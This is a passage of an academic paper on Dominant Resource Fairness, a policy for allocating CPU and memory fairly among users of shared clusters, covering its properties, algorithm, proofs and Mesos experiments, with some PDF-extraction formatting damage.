multiple resources. The intuition behind DRF is\nthat in a multi-resource environment, the allocation of a\nuser should be determined by the user’s dominant share ,\nwhich is the maximum share that the user has been allo-\ncated of any resource. In a nutshell, DRF seeks to max-\nimize the minimum dominant share across all users. For\nexample, if user Aruns CPU-heavy tasks and user Bruns\nmemory-heavy tasks, DRF attempts to equalize user A’s\nshare of CPUs with user B’s share of memory. In the\nsingle resource case, DRF reduces to max-min fairness\nfor that resource.\nThe strength of DRF lies in the properties it satis-\nfies. These properties are trivially satisfied by max-min\nfairness for a single resource, but are non-trivial in the\ncase of multiple resources. Four such properties are\n1sharing incentive, strategy-proofness, Pareto efficiency,\nand envy-freeness. DRF provides incentives for users to\nshare resources by guaranteeing that no user is better off\nin a system in which resources are statically and equally\npartitioned among users. Furthermore, DRF is strategy-\nproof, as a user cannot get a better allocation by lying\nabout her resource demands. DRF is Pareto-efficient as\nit allocates all available resources subject to satisfying\nthe other properties, and without preempting existing al-\nlocations. Finally, DRF is envy-free, as no user prefers\nthe allocation of another user. Other solutions violate at\nleast one of the above properties. For example, the pre-\nferred [3, 22, 33] fair division mechanism in microeco-\nnomic theory, Competitive Equilibrium from Equal In-\ncomes [30], is not strategy-proof.\nWe have implemented and evaluated DRF in\nMesos [16], a resource manager over which multiple\ncluster computing frameworks, such as Hadoop and MPI,\ncan run. We compare DRF with the slot-based fair shar-\ning scheme used in Hadoop and Dryad and show that\nslot-based fair sharing can lead to poorer performance,\nunfairly punishing certain workloads, while providing\nweaker isolation guarantees.\nWhile this paper focuses on resource allocation in dat-\nacenters, we believe that DRF is generally applicable to\nother multi-resource environments where users have het-\nerogeneous demands, such as in multi-core machines.\nThe rest of this paper is organized as follows. Sec-\ntion 2 motivates the problem of multi-resource fairness.\nSection 3 lists fairness properties that we will consider in\nthis paper. Section 4 introduces DRF. Section 5 presents\nalternative notions of fairness, while Section 6 analyzes\nthe properties of DRF and other policies. Section 7 pro-\nvides experimental results based on traces from a Face-\nbook Hadoop cluster. We survey related work in Sec-\ntion 8 and conclude in Section 9.\n2 Motivation\nWhile previous work on weighted max-min fairness has\nfocused on single resources, the advent of cloud com-\nputing and multi-core processors has increased the need\nfor allocation policies for environments with multiple\nresources and heterogeneous user demands. By multi-\nple resources we mean resources of different types , in-\nstead of multiple instances of the same interchangeable\nresource.\nTo motivate the need for multi-resource allocation, we\nplot the resource usage profiles of tasks in a 2000-node\nHadoop cluster at Facebook over one month (October\n2010) in Figure 1. The placement of a circle in Figure 1\nindicates the memory and CPU resources consumed by\ntasks. The size of a circle is logarithmic to the number of\ntasks in the region of the circle. Though the majority of\ntasks are CPU-heavy, there exist tasks that are memory-\n0 1 2 3 4 5 6 7 8 9\nPer task memory demand (GB)01234567Per task CPU demand (cores)Maps\nReducesFigure 1: CPU and memory demands of tasks in a 2000-node\nHadoop cluster at Facebook over one month (October 2010).\nEach bubble’s size is logarithmic in the number of tasks in its\nregion.\nheavy as well, especially for reduce operations.\nExisting fair schedulers for clusters, such as Quincy\n[18] and the Hadoop Fair Scheduler [2, 34], ignore the\nheterogeneity of user demands, and allocate resources at\nthe granularity of slots, where a slot is a fixed fraction\nof a node. This leads to inefficient allocation as a slot is\nmore often than not a poor match for the task demands.\nFigure 2 quantifies the level of fairness and isola-\ntion provided by the Hadoop MapReduce fair sched-\nuler [2, 34]. The figure shows the CDFs of the ratio\nbetween the task CPU demand and the slot CPU share,\nand of the ratio between the task memory demand and\nthe slot memory share. We compute the slot memory\nand CPU shares by simply dividing the total amount of\nmemory and CPUs by the number of slots. A ratio of\n1corresponds to a perfect match between the task de-\nmands and slot resources, a ratio below 1corresponds to\ntasks underutilizing their slot resources, and a ratio above\n1corresponds to tasks over-utilizing their slot resources,\nwhich may lead to thrashing. Figure 2 shows that most of\nthe tasks either underutilize or overutilize some of their\nslot resources. Modifying the number of slots per ma-\nchine will not solve the problem as this may result either\nin a lower overall utilization or more tasks experiencing\npoor performance due to over-utilization (see Section 7).\n3 Allocation Properties\nWe now turn our attention to designing a max-min fair al-\nlocation policy for multiple resources and heterogeneous\nrequests. To illustrate the problem, consider a system\nconsisting of 9 CPUs and 18 GB RAM, and two users:\nuserAruns tasks that require h1 CPUs, 4 GBieach, and\nuserBruns tasks that require h3 CPUs, 1 GBieach.\nWhat constitutes a fair allocation policy for this case?\n20.0 0.5 1.0 1.5 2.0 2.5\nRatio of task demand to resource per slot0.00.20.40.60.81.0CDF of tasks\nMemory demand\nCPU demandFigure 2: CDF of demand to slot ratio in a 2000-node cluster at\nFacebook over a one month period (October 2010). A demand\nto slot ratio of 2:0represents a task that requires twice as much\nCPU (or memory) than the slot CPU (or memory) size.\nOne possibility would be to allocate each user half of\nevery resource. Another possibility would be to equal-\nize the aggregate ( i.e.,CPU plus memory) allocations of\neach user. While it is relatively easy to come up with a\nvariety of possible “fair” allocations, it is unclear how to\nevaluate and compare these allocations.\nTo address this challenge, we start with a set of de-\nsirable properties that we believe any resource alloca-\ntion policy for multiple resources and heterogeneous de-\nmands should satisfy. We then let these properties guide\nthe development of a fair allocation policy. We have\nfound the following four properties to be important:\n1.Sharing incentive: Each user should be better off\nsharing the cluster, than exclusively using her own\npartition of the cluster. Consider a cluster with iden-\ntical nodes and nusers. Then a user should not be\nable to allocate more tasks in a cluster partition con-\nsisting of1\nnof all resources.\n2.Strategy-proofness: Users should not be able to\nbenefit by lying about their resource demands. This\nprovides incentive compatibility, as a user cannot\nimprove her allocation by lying.\n3.Envy-freeness: A user should not prefer the allo-\ncation of another user. This property embodies the\nnotion of fairness [13, 30].\n4.Pareto efficiency: It should not be possible to in-\ncrease the allocation of a user without decreasing\nthe allocation of at least another user. This prop-\nerty is important as it leads to maximizing system\nutilization subject to satisfying the other properties.\nWe briefly comment on the strategy-proofness and\nsharing incentive properties, which we believe are of\nspecial importance in datacenter environments. Anec-\ndotal evidence from cloud operators that we have talkedwith indicates that strategy-proofness is important, as it\nis common for users to attempt to manipulate schedulers.\nFor example, one of Yahoo!’s Hadoop MapReduce dat-\nacenters has different numbers of slots for map and re-\nduce tasks. A user discovered that the map slots were\ncontended, and therefore launched all his jobs as long\nreduce phases, which would manually do the work that\nMapReduce does in its map phase. Another big search\ncompany provided dedicated machines for jobs only if\nthe users could guarantee high utilization. The company\nsoon found that users would sprinkle their code with in-\nfinite loops to artificially inflate utilization levels.\nFurthermore, any policy that satisfies the sharing in-\ncentive property also provides performance isolation, as\nit guarantees a minimum allocation to each user ( i.e.,a\nuser cannot do worse than owning1\nnof the cluster) irre-\nspective of the demands of the other users.\nIt can be easily shown that in the case of a single re-\nsource, max-min fairness satisfies all the above proper-\nties. However, achieving these properties in the case\nof multiple resources and heterogeneous user demands\nis not trivial. For example, the preferred fair division\nmechanism in microeconomic theory, Competitive Equi-\nlibrium from Equal Incomes [22, 30, 33], is not strategy-\nproof (see Section 6.1.2).\nIn addition to the above properties, we consider four\nother nice-to-have properties:\n\u000fSingle resource fairness: For a single resource, the\nsolution should reduce to max-min fairness.\n\u000fBottleneck fairness: If there is one resource that is\npercent-wise demanded most of by every user, then\nthe solution should reduce to max-min fairness for\nthat resource.\n\u000fPopulation monotonicity: When a user leaves the\nsystem and relinquishes her resources, none of the\nallocations of the remaining users should decrease.\n\u000fResource monotonicity: If more resources are added\nto the system, none of the allocations of the existing\nusers should decrease.\n4 Dominant Resource Fairness (DRF)\nWe propose Dominant Resource Fairness (DRF), a new\nallocation policy for multiple resources that meets all\nfour of the required properties in the previous section.\nFor every user, DRF computes the share of each resource\nallocated to that user. The maximum among all shares\nof a user is called that user’s dominant share , and the\nresource corresponding to the dominant share is called\nthedominant resource . Different users may have dif-\nferent dominant resources. For example, the dominant\nresource of a user running a computation-bound job is\n3User A User B \nCPUs (9 total) Memory (18GB total) 100% 50% 0% 3 CPUs 12 GB 6 CPUs 2 GB Figure 3: DRF allocation for the example in Section 4.1.\nCPU, while the dominant resource of a user running an\nI/O-bound job is bandwidth.1DRF simply applies max-\nmin fairness across users’ dominant shares. That is, DRF\nseeks to maximize the smallest dominant share in the\nsystem, then the second-smallest, and so on.\nWe start by illustrating DRF with an example ( x4.1),\nthen present an algorithm for DRF ( x4.2) and a defini-\ntion of weighted DRF ( x4.3). In Section 5, we present\ntwo other allocation policies: asset fairness, a straightfor-\nward policy that aims to equalize the aggregate resources\nallocated to each user, and competitive equilibrium from\nequal incomes (CEEI), a popular fair allocation policy\npreferred in the micro-economic domain [22, 30, 33].\nIn this section, we consider a computation model with\nnusers andmresources. Each user runs individual tasks,\nand each task is characterized by a demand vector , which\nspecifies the amount of resources required by the task,\ne.g.,h1 CPU, 4 GBi. In general, tasks (even the ones\nbelonging to the same user) may have different demands.\n4.1 An Example\nConsider a system with of 9 CPUs, 18 GB RAM, and two\nusers, where user Aruns tasks with demand vector h1\nCPU, 4 GBi, and userBruns tasks with demand vector\nh3 CPUs, 1 GBieach.\nIn the above scenario, each task from user Aconsumes\n1=9of the total CPUs and 2=9of the total memory, so\nuserA’s dominant resource is memory. Each task from\nuserBconsumes 1=3of the total CPUs and 1=18of the\ntotal memory, so user B’s dominant resource is CPU.\nDRF will equalize users’ dominant shares, giving the al-\nlocation in Figure 3: three tasks for user A, with a total\nofh3 CPUs, 12 GBi, and two tasks for user B, with a\ntotal ofh6 CPUs, 2 GBi. With this allocation, each user\nends up with the same dominant share, i.e.,userAgets\n2=3of RAM, while user Bgets2=3of the CPUs.\nThis allocation can be computed mathematically as\nfollows. Let xandybe the number of tasks allocated\n1A user may have the same share on multiple resources, and might\ntherefore have multiple dominant resources.Algorithm 1 DRF pseudo-code\nR=hr1;\u0001\u0001\u0001;rmi.total resource capacities\nC=hc1;\u0001\u0001\u0001;cmi.consumed resources, initially 0\nsi(i= 1::n).useri’s dominant shares, initially 0\nUi=hui;1;\u0001\u0001\u0001;ui;mi(i= 1::n).resources given to\nuseri, initially 0\npick useriwith lowest dominant share si\nDi demand of user i’s next task\nifC+Di\u0014Rthen\nC=C+Di.update consumed vector\nUi=Ui+Di.updatei’s allocation vector\nsi= maxm\nj=1fui;j=rjg\nelse\nreturn .the cluster is full\nend if\nby DRF to users AandB, respectively. Then user A\nreceiveshxCPU, 4xGBi, while user Bgetsh3yCPU,\nyGBi. The total amount of resources allocated to both\nusers is (x+ 3y)CPUs and (4x+y)GB. Also, the dom-\ninant shares of users AandBare4x=18 = 2x=9and\n3y=9 =y=3, respectively (their corresponding shares of\nmemory and CPU). The DRF allocation is then given by\nthe solution to the following optimization problem:\nmax (x;y) (Maximize allocations)\nsubject to\nx+ 3y\u00149(CPU constraint)\n4x+y\u001418(Memory constraint)\n2x\n9=y\n3(Equalize dominant shares)\nSolving this problem yields2x= 3andy= 2. Thus,\nuserAgetsh3 CPU, 12 GBiandBgetsh6 CPU, 2 GBi.\nNote that DRF need not always equalize users’ domi-\nnant shares. When a user’s total demand is met, that user\nwill not need more tasks, so the excess resources will\nbe split among the other users, much like in max-min\nfairness. In addition, if a resource gets exhausted, users\nthat do not need that resource can still continue receiv-\ning higher shares of the other resources. We present an\nalgorithm for DRF allocation in the next section.\n4.2 DRF Scheduling Algorithm\nAlgorithm 1 shows pseudo-code for DRF scheduling.\nThe algorithm tracks the total resources allocated to each\nuser as well as the user’s dominant share, si. At each\nstep, DRF picks the user with the lowest dominant share\namong those with tasks ready to run. If that user’s task\ndemand can be satisfied, i.e.,there are enough resources\n2Note that given last constraint ( i.e., 2x=9 =y=3) allocations x\nandyare simultaneously maximized.\n4ScheduleUserA UserB CPU RAM\nres. shares dom. share res. shares dom. share total alloc. total alloc.\nUserB h0;0i 0 h3=9;1=18i 1/3 3/9 1/18\nUserA h1=9;4=18i 2/9 h3=9;1=18i 1/3 4/9 5/18\nUserA h2=9;8=18i 4/9 h3=9;1=18i 1/3 5/9 9/18\nUserB h2=9;8=18i 4/9 h6=9;2=18i 2/3 8/9 10/18\nUserA h3=9;12=18i 2/3 h6=9;2=18i 2/3 1 14/18\nTable 1: Example of DRF allocating resources in a system with 9 CPUs and 18 GB RAM to two users running tasks that require\nh1 CPU, 4 GB iandh3 CPUs, 1 GB i, respectively. Each row corresponds to DRF making a scheduling decision. A row shows the\nshares of each user for each resource, the user’s dominant share, and the fraction of each resource allocated so far. DRF repeatedly\nselects the user with the lowest dominant share (indicated in bold) to launch a task, until no more tasks can be allocated.\navailable in the system, one of her tasks is launched. We\nconsider the general case in which a user can have tasks\nwith different demand vectors, and we use variable Dito\ndenote the demand vector of the next task user iwants\nto launch. For simplicity, the pseudo-code does not cap-\nture the event of a task finishing. In this case, the user\nreleases the task’s resources and DRF again selects the\nuser with the smallest dominant share to run her task.\nConsider the two-user example in Section 4.1. Table 1\nillustrates the DRF allocation process for this example.\nDRF first picks Bto run a task. As a result, the shares\nofBbecomeh3=9,1=18i, and the dominant share be-\ncomes max(3=9;1=18) = 1=3. Next, DRF picks A, as\nher dominant share is 0. The process continues until it\nis no longer possible to run new tasks. In this case, this\nhappens as soon as CPU has been saturated.\nAt the end of the above allocation, user Agetsh3 CPU,\n12 GBi, while userBgetsh6 CPU, 2 GBi,i.e.,each user\ngets2=3of its dominant resource.\nNote that in this example the allocation stops as soon\nas any resource is saturated. However, in the general\ncase, it may be possible to continue to allocate tasks even\nafter some resource has been saturated, as some tasks\nmight not have any demand on the saturated resource.\nThe above algorithm can be implemented using a bi-\nnary heap that stores each user’s dominant share. Each\nscheduling decision then takes O(logn)time fornusers.\n4.3 Weighted DRF\nIn practice, there are many cases in which allocating re-\nsources equally across users is not the desirable policy.\nInstead, we may want to allocate more resources to users\nrunning more important jobs, or to users that have con-\ntributed more resources to the cluster. To achieve this\ngoal, we propose Weighted DRF, a generalization of both\nDRF and weighted max-min fairness.\nWith Weighted DRF, each user iis associated a weight\nvectorWi=hwi;1;:::;wi;mi, wherewi;jrepresents the\nweight of user ifor resource j. The definition of a dom-\ninant share for user ichanges tosi= maxjfui;j=wi;jg,\nwhereui;jis useri’s share of resource j. A particularcase of interest is when all the weights of user iare equal,\ni.e.,wi;j=wi, (1\u0014j\u0014m). In this case, the ratio be-\ntween the dominant shares of users iandjwill be simply\nwi=wj. If the weights of all users are set to 1, Weighted\nDRF reduces trivially to DRF.\n5 Alternative Fair Allocation Policies\nDefining a fair allocation in a multi-resource system is\nnot an easy question, as the notion of “fairness” is itself\nopen to discussion. In our efforts, we considered numer-\nous allocation policies before settling on DRF as the only\none that satisfies all four of the required properties in\nSection 3: sharing incentive, strategy-proofness, Pareto\nefficiency, and envy-freeness. In this section, we con-\nsider two of the alternatives we have investigated: Asset\nFairness, a simple and intuitive policy that aims to equal-\nize the aggregate resources allocated to each user, and\nCompetitive Equilibrium from Equal Incomes (CEEI),\nthe policy of choice for fairly allocating resources in the\nmicroeconomic domain [22, 30, 33]. We compare these\npolicies with DRF in Section 5.3.\n5.1 Asset Fairness\nThe idea behind Asset Fairness is that equal shares of\ndifferent resources are worth the same, i.e.,that 1% of\nall CPUs worth is the same as 1% of memory and 1%\nof I/O bandwidth. Asset Fairness then tries to equalize\nthe aggregate resource value allocated to each user. In\nparticular, Asset Fairness computes for each user ithe\naggregate share xi=P\njsi;j, wheresi;jis the share of\nresourcejgiven to user i. It then applies max-min across\nusers’ aggregate shares, i.e.,it repeatedly launches tasks\nfor the user with the minimum aggregate share.\nConsider the example in Section 4.1. Since there are\ntwice as many GB of RAM as CPUs ( i.e.,9 CPUs and\n18 GB RAM), one CPU is worth twice as much as one\nGB of RAM. Supposing that one GB is worth $1 and\none CPU is worth $2, it follows that user Aspends $6\nfor each task, while user Bspends $7. Let xandybe\nthe number of tasks allocated by Asset Fairness to users\nAandB, respectively. Then the asset-fair allocation is\n5given by the solution to the following optimization prob-\nlem:\nmax (x;y) (Maximize allocations)\nsubject to\nx+ 3y\u00149(CPU constraint)\n4x+y\u001418(Memory constraint)\n6x= 7y(Every user spends the same)\nSolving the above problem yields x= 2:52andy=\n2:16. Thus, user Agetsh2.5 CPUs, 10.1 GB i, while user\nBgetsh6.5 CPUs, 2.2 GBi, respectively.\nWhile this allocation policy seems compelling in its\nsimplicity, it has a significant drawback: it violates the\nsharing incentive property. As we show in Section 6.1.1,\nasset fairness can result in one user getting less than 1=n\nof all resources, where nis the total number of users.\n5.2 Competitive Equilibrium from Equal Incomes\nIn microeconomic theory, the preferred method to fairly\ndivide resources is Competitive Equilibrium from Equal\nIncomes (CEEI) [22, 30, 33]. With CEEI, each user re-\nceives initially1\nnof every resource, and subsequently,\neach user trades her resources with other users in a per-\nfectly competitive market.3The outcome of CEEI is both\nenvy-free and Pareto efficient [30].\nMore precisely, the CEEI allocation is given by the\nNash bargaining solution4[22, 23]. The Nash bargain-\ning solution picks the feasible allocation that maximizesQ\niui(ai), whereui(ai)is the utility that user igets from\nher allocation ai. To simplify the comparison, we assume\nthat the utility that a user gets from her allocation is sim-\nply her dominant share, si.\nConsider again the two-user example in Section 4.1.\nRecall that the dominant share of user Ais4x=18 =\n2x=9while the dominant share of user Bis3y=9 =y=3,\nwherexis the number of tasks given to Aandyis the\nnumber of tasks given to B. Maximizing the product\nof the dominant shares is equivalent to maximizing the\nproductx\u0001y. Thus, CEEI aims to solve the following\noptimization problem:\nmax (x\u0001y) (maximize Nash product)\nsubject to\nx+ 3y\u00149(CPU constraint)\n4x+y\u001418(Memory constraint)\nSolving the above problem yields x= 45=11andy=\n18=11. Thus, user Agetsh4.1 CPUs, 16.4 GB i, while\nuserBgetsh4.9 CPUs, 1.6 GBi.\n3A perfect market satisfies the price-taking ( i.e.,no single user af-\nfects prices) and market-clearance ( i.e.,matching supply and demand\nvia price adjustment) assumptions.\n4For this to hold, utilities have to be homogeneous, i.e.,u(\u000bx) =\n\u000bu(x)for\u000b> 0, which is true in our case.\nUser A User B \na) DRF b) Asset Fairness CPU Mem CPU Mem CPU Mem 100% 50% 0% 100% 50% 0% 100% 50% 0% c) CEEI Figure 4: Allocations given by DRF, Asset Fairness and CEEI\nin the example scenario in Section 4.1.\nUnfortunately, while CEEI is envy-free and Pareto ef-\nficient, it turns out that it is notstrategy-proof, as we will\nshow in Section 6.1.2. Thus, users can increase their al-\nlocations by lying about their resource demands.\n5.3 Comparison with DRF\nTo give the reader an intuitive understanding of Asset\nFairness and CEEI, we compare their allocations for the\nexample in Section 4.1 to that of DRF in Figure 4.\nWe see that DRF equalizes the dominant shares of the\nusers, i.e., userA’s memory share and user B’s CPU\nshare. In contrast, Asset Fairness equalizes the total frac-\ntion of resources allocated to each user, i.e.,the areas of\nthe rectangles for each user in the figure. Finally, be-\ncause CEEI assumes a perfectly competitive market, it\nfinds a solution satisfying market clearance, where ev-\nery resource has been allocated. Unfortunately, this ex-\nact property makes it possible to cheat CEEI: a user can\nclaim she needs more of some underutilized resource\neven when she does not, leading CEEI to give more tasks\noverall to this user to achieve market clearance.\n6 Analysis\nIn this section, we discuss which of the properties pre-\nsented in Section 3 are satisfied by Asset Fairness, CEEI,\nand DRF. We also evaluate the accuracy of DRF when\ntask sizes do not match the available resources exactly.\n6.1 Fairness Properties\nTable 2 summarizes the fairness properties that are sat-\nisfied by Asset Fairness, CEEI, and DRF. The Appendix\ncontains the proofs of the main properties of DRF, while\nour technical report [14] contains a more complete list of\nresults for DRF and CEEI. In the remainder of this sec-\ntion, we discuss some of the interesting missing entries\nin the table, i.e.,properties violated by each of these dis-\nciplines. In particular, we show through examples why\nAsset Fairness and CEEI lack the properties that they\n6Allocation Policy\nProperty Asset CEEI DRF\nSharing Incentive XX\nStrategy-proofness XX\nEnvy-freeness XXX\nPareto efficiency XXX\nSingle Resource Fairness XXX\nBottleneck Fairness XX\nPopulation Monotonicity XX\nResource Monotonicity\nTable 2: Properties of Asset Fairness, CEEI and DRF.\ndo, and we prove that no policy can provide resource\nmonotonicity without violating either sharing incentive\nor Pareto efficiency to explain why DRF lacks resource\nmonotonicity.\n6.1.1 Properties Violated by Asset Fairness\nWhile being the simplest policy, Asset Fairness violates\nseveral important properties: sharing incentive, bottle-\nneck fairness, and resource monotonicity. Next, we use\nexamples to show the violation of these properties.\nTheorem 1 Asset Fairness violates the sharing incen-\ntive property.\nProof Consider the following example, illustrated in\nFigure 5: two users in a system with h30;30itotal re-\nsources have demand vectors D1=h1;3i, andD2=\nh1;1i. Asset fairness will allocate the first user 6tasks\nand the second user 12tasks. The first user will receive\nh6;18iresources, while the second will use h12;12i.\nWhile each user gets an equal aggregate share of24\n60, the\nsecond user gets less than half ( 15) of both resources.\nThis violates the sharing incentive property, as the sec-\nond user would be better off to statically partition the\ncluster and own half of the nodes. \u0003\nTheorem 2 Asset Fairness violates the bottleneck fair-\nness property.\nProof Consider a scenario with a total resource vector of\nh21;21iand two users with demand vectors D1=h3;2i\nandD2=h4;1i, making resource 1 the bottleneck re-\nsource. Asset fairness will give each user 3tasks, equal-\nizing their aggregate usage to 15. However, this only\ngives the first user3\n7of resource 1 (the contended bottle-\nneck resource), violating bottleneck fairness. \u0003\nTheorem 3 Asset fairness does not satisfy resource\nmonotonicity.\n Resource 1 Resource 2 User 1 User 2 100% 50% 0% Figure 5: Example showing that Asset Fairness can fail to meet\nthe sharing incentive property. Asset Fairness gives user 2 less\nthan half of both resources.\nUser 1 User 2 \na) With truthful demands b) With user 1 lying Res. 1 100% 50% 0% 100% 50% 0% Res. 2 Res. 1 Res. 2 \nFigure 6: Example showing how CEEI violates strategy proof-\nness. User 1 can increase her share by claiming that she needs\nmore of resource 2 than she actually does.\nProof Consider two users AandBwith demandsh4;2i\nandh1;1iand77units of two resources. Asset fairness\nallocatesAa total ofh44;22iandBh33;33iequalizing\ntheir sum of shares to66\n77. If resource two is doubled, both\nusers’ share of the second resource is halved, while the\nfirst resource is saturated. Asset fairness now decreases\nA’s allocation toh42;21iand increases B’s toh35;35i,\nequalizing their shares to42\n77+21\n154=35\n77+35\n154=105\n154.\nThus resource monotonicity is violated. \u0003\n6.1.2 Properties Violated by CEEI\nWhile CEEI is envy-free and Pareto efficient, it turns\nout that it is notstrategy proof. Intuitively, this is be-\ncause CEEI assumes a perfectly competitive market that\nachieves market clearance ,i.e.,matching of supply and\ndemand and allocation of all the available resources.\nThis can lead to CEEI giving much higher shares to users\nthat use more of a less-contended resource in order to\nfully utilize that resource. Thus, a user can claim that she\nneeds more of some underutilized resource to increase\nher overall share of resources. We illustrate this below.\nTheorem 4 CEEI is not strategy-proof.\n7User 1 User 2 User 3 \na) With 3 users b) After user 3 leaves Res. 1 100% 50% 0% 100% 50% 0% Res. 2 Res. 1 Res. 2 Figure 7: Example showing that CEEI violates population\nmonotonicity. When user 3 leaves, CEEI changes the alloca-\ntion from a) to b), lowering the share of user 2.\nProof Consider the following example, shown in Figure\n6. Assume a total resource vector of h100;100i, and two\nusers with demands h16;1iandh1;2i. In this case, CEEI\nallocates100\n31and1500\n31tasks to each user respectively\n(approximately 3.2 and 48.8 tasks). If user 1changes her\ndemand vector to h16;8i, asking for more of resource\n2 than she actually needs, CEEI gives the the users25\n6\nand100\n3tasks respectively (approximately 4:2and33:3\ntasks). Thus, user 1 improves her number of tasks from\n3.2 to 4.2 by lying about her demand vector. User 2suf-\nfers because of this, as her task allocation decreases. \u0003\nIn addition, for the same intuitive reason (market\nclearance), we have the following result:\nTheorem 5 CEEI violates population monotonicity.\nProof Consider the total resource vector h100;100iand\nthree users with the following demand vectors D1=\nh4;1i,D2=h1;16i, andD3=h16;1i(see Figure 7).\nCEEI will yield the allocation A1=h11:3;5:4;3:1i,\nwhere the numbers in parenthesis represent the number\nof tasks allocated to each user. If user 3leaves the system\nand relinquishes her resource, CEEI gives the new allo-\ncationA2=h23:8;4:8i, which has made user 2worse\noff than inA1. \u0003\n6.1.3 Resource Monotonicity vs. Sharing Incentives\nand Pareto efficiency\nAs shown in Table 2, DRF achieves all the properties ex-\ncept resource monotonicity. Rather than being a limita-\ntion of DRF, this is a consequence of the fact that sharing\nincentive, Pareto efficiency, and resource monotonicity\ncannot be achieved simultaneously. Since we consider\nthe first two of these properties to be more important (see\nSection 3) and since adding new resources to a system is\na relatively rare event, we chose to satisfy sharing incen-\ntive and Pareto efficiency, and give up resource mono-\ntonicity. In particular, we have the following result.Theorem 6 No allocation policy that satisfies the shar-\ning incentive and Pareto efficiency properties can also\nsatisfy resource monotonicity.\nProof We use a simple example to prove this prop-\nerty. Consider two users AandBwith symmetric de-\nmandsh2;1i, andh1;2i, respectively, and assume equal\namounts of both resources. Sharing incentive requires\nthat userAgets at least half of resource 1and userB\ngets half of resource 2. By Pareto efficiency, we know\nthat at least one of the two users must be allocated more\nresources. Without loss of generality, assume that user A\nis given more than half of resource 1(a symmetric argu-\nment holds if user Bis given more than half of resource\n2). If the total amount of resource 2is now increased by\na factor of 4, userBis no longer getting its guaranteed\nshare of half of resource 2. Now, the only feasible allo-\ncation that satisfies the sharing incentive is to give both\nusers half of resource 1, which would require decreas-\ning user 1’s share of resource 1, thus violating resource\nmonotonicity. \u0003\nThis theorem explains why both DRF and CEEI vio-\nlate resource monotonicity.\n6.2 Discrete Resource Allocation\nSo far, we have implicitly assumed one big resource\npool whose resources can be allocated in arbitrarily small\namounts. Of course, this is often not the case in prac-\ntice. For example, clusters consist of many small ma-\nchines, where resources are allocated to tasks in discrete\namounts. In the reminder of this section, we refer to\nthese two scenarios as the continuous , and the discrete\nscenario, respectively. We now turn our attention to how\nfairness is affected in the discrete scenario.\nAssume a cluster consisting of Kmachines.\nLet max-task denote the maximum demand vec-\ntor across all demand vectors, i.e., max-task =\nhmaxifdi;1g;maxifdi;2g;\u0001\u0001\u0001;maxifdi;mgi. Assume\nfurther that any task can be scheduled on every machine,\ni.e., the total amount of resources on each machine\nis at least max-task. We only consider the case when\neach user has strictly positive demands. Given these\nassumptions, we have the following result.\nTheorem 7 In the discrete scenario, it is possible to al-\nlocate resources such that the difference between the al-\nlocations of any two users is bounded by one max-task\ncompared to the continuous allocation scenario.\nProof Assume we start allocating resources on one ma-\nchine at a time, and that we always allocate a task to the\nuser with the lowest dominant share. As long as there\nis at least a max-task available on the first machine, we\n80 50 100 150 200 250 300\n(a)0.00.20.40.60.81.0Job 1 ShareJob 1 CPU\nJob 1 Memory\n0 50 100 150 200 250 300\n(b)0.00.20.40.60.81.0Job 2 ShareJob 2 CPU\nJob 2 Memory\n0 50 100 150 200 250 300\nTime (s)\n(c)0.00.20.40.60.81.0Dominant ShareJob 1\nJob 2Figure 8: CPU, memory and dominant share for two jobs.\ncontinue to allocate a task to the next user with least dom-\ninant share. Once the available resources on the first ma-\nchine become less than a max-task size, we move to the\nnext machine and repeat the process. When the alloca-\ntion completes, the difference between two user’s alloca-\ntions of their dominant resources compared to the con-\ntinuous scenario is at most max-task . If this were not the\ncase, then some user Awould have more than max-task\ndiscrepancy w.r.t. to another user B. However, this can-\nnot be the case, because the last time Awas allocated a\ntask,Bshould have been allocated a task instead. \u0003\n7 Experimental Results\nThis section evaluates DRF through micro- and macro-\nbenchmarks. The former is done through experiments\nrunning an implementation of DRF in the Mesos cluster\nresource manager [16]. The latter is done using trace-\ndriven simulations.\nWe start by showing how DRF dynamically adjusts the\nshares of jobs with different resource demands in Section\n7.1. In Section 7.2, we compare DRF against slot-level\nfair sharing (as implemented by Hadoop Fair Scheduler\n[34] and Quincy [18]), and CPU-only fair sharing. Fi-\nnally, in Section 7.3, we use Facebook traces to compare\nDRF and the Hadoop’s Fair Scheduler in terms of utiliza-tion and job completion time.\n7.1 Dynamic Resource Sharing\nIn our first experiment, we show how DRF dynamically\nshares resources between jobs with different demands.\nWe ran two jobs on a 48-node Mesos cluster on Amazon\nEC2, using “extra large” instances with 4 CPU cores and\n15 GB of RAM. We configured Mesos to allocate up to\n4 CPUs and 14 GB of RAM on each node, leaving 1 GB\nfor the OS. We submitted two jobs that launched tasks\nwith different resource demands at different times during\na 6-minute interval.\nFigures 8 (a) and 8 (b) show the CPU and memory al-\nlocations given to each job as a function of time, while\nFigure 8 (c) shows their dominant shares. In the first 2\nminutes, job 1 uses h1 CPU, 10 GB RAM iper task and\njob 2 usesh1 CPU, 1 GB RAM iper task. Job 1’s dom-\ninant resource is RAM, while job 2’s dominant resource\nis CPU. Note that DRF equalizes the jobs’ shares of their\ndominant resources. In addition, because jobs have dif-\nferent dominant resources, their dominant shares exceed\n50%, i.e.,job 1 uses around 70% of the RAM while job\n2 uses around 75% of the CPUs. Thus, the jobs benefit\nfrom running in a shared cluster as opposed to taking half\nthe nodes each. This captures the essence of the sharing\nincentive property.\nAfter 2 minutes, the task sizes of both jobs change, to\nh2 CPUs, 4 GBifor job 1 andh1 CPU, 3 GBifor job\n2. Now, both jobs’ dominant resource is CPU, so DRF\nequalizes their CPU shares. Note that DRF switches allo-\ncations dynamically by having Mesos offer resources to\nthe job with the smallest dominant share as tasks finish.\nFinally, after 2 more minutes, the task sizes of both\njobs change again: h1 CPU, 7 GBifor job 1 andh1 CPU,\n4 GBifor job 2. Both jobs’ dominant resource is now\nmemory, so DRF tries to equalize their memory shares.\nThe reason the shares are not exactly equal is due to re-\nsource fragmentation (see Section 6.2).\n7.2 DRF vs. Alternative Allocation Policies\nWe next evaluate DRF with respect to two alternative\nschemes: slot-based fair scheduling (a common policy in\ncurrent systems, such as the Hadoop Fair Scheduler [34]\nand Quincy [18]) and (max-min) fair sharing applied\nonly to a single resource (CPU). For the experiment, we\nran a 48-node Mesos cluster on EC2 instances with 8\nCPU cores and 7 GB RAM each. We configured Mesos\nto allocate 8 CPUs and 6 GB RAM on each node, leav-\ning 1 GB free for the OS. We implemented these three\nscheduling policies as Mesos allocation modules.\nWe ran a workload with two classes of users, repre-\nsenting two organizational entities with different work-\nloads. One of the entities had four users submitting small\njobs with task demands h1 CPU, 0.5 GBi. The other en-\n9DRF 3 slots 4 slots 5 slots 6 slots 